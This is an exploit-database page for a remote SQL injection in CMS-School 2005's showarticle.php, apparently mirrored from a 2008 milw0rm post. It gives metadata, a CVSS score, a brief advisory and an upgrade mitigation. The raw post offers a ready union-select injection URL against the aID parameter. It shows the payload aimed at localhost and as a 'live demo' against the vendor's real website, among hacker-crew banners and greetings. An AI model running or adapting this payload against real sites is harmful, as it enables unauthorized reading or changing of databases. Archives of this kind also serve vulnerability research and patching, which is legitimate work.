header-logo
Suggest Exploit
vendor:
CMS-School 2005
by:
Maghribi WnaftakhaR
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS-School 2005
Affected Version From: CMS-School 2005
Affected Version To: CMS-School 2005
Patch Exists: YES
Related CWE: N/A
CPE: a:cms-school:cms-school_2005
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 + Apache 2.0.54 + PHP 5.0.3 + MySQL 4.1.11
2005

CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability

CMS-School 2005 is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of CMS-School 2005.
Source

Exploit-DB raw data:

*********************************************************************************************        
[!]                                                                                       [!]
[!] OOOO             O                                 OOOOOOOOO                          [!]
[!]O    O            O                                 O      O                           [!]
[!]O                 O                                       O                            [!]
[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
[!]          OO                                                                           [!]
[!]         OO                                                                            [!]
[!]        OO                          Proud To Be MoroCCaN                               [!]
[!]       OO                                                                              [!]
*********************************************************************************************
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
---------------------------------------------------------------------------------------------
=          CMS-School 2005 (showarticle.php) Remote SQL injection Vulnerability             =
---------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------
-===========================================================================================-
-=                  SQL InjEction By : Cyber-Zone                                          =-
-=                                                                                         =-
-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
-=                                                                                         =-
-=                  Home : WwW.IQ-Ty.CoM                                                   =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Download : http://www.niclor.net/prodotti/cms_school/



Exploit : http://localhost/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--


live demo :


http://www.niclor.net/prodotti/cms_school/showarticle.php?aID=-4+union+select+version(),2,3--

---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-=            Hussin X , CraCkEr , Force-Major , WaLid , GeneraL-Oujda , Oujda-Lord        =-
-=                                                                                         =-
-=                         WwW.IQ-ty.Com , No-Exploit (JIKO)                               =-
-=                                                                                         =-
-=                               Oujda SeCurity TeaM                                       =-
-===========================================================================================-
---------------------------------------------------------------------------------------------

Spicial ThanX To My Friend StaCk & All KazaWa Boys :)

# milw0rm.com [2008-11-04]

Navigation

Suggest Exploit

Services By CQR